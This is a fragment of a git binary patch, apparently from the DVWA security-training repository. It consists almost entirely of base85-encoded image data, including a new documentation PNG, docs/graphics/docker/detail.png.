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 ae`Ov5PRq~Ecmc|QEhs)4n~bU~{{I8iQOall literal 0 HcmV?d00001 diff --git a/DVWA/docs/graphics/docker/detail.png b/DVWA/docs/graphics/docker/detail.png new file mode 100644 index 0000000000000000000000000000000000000000..b428ff26dad11f7942d6feb5b139ac7ab858efa7 GIT binary patch literal 164347 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 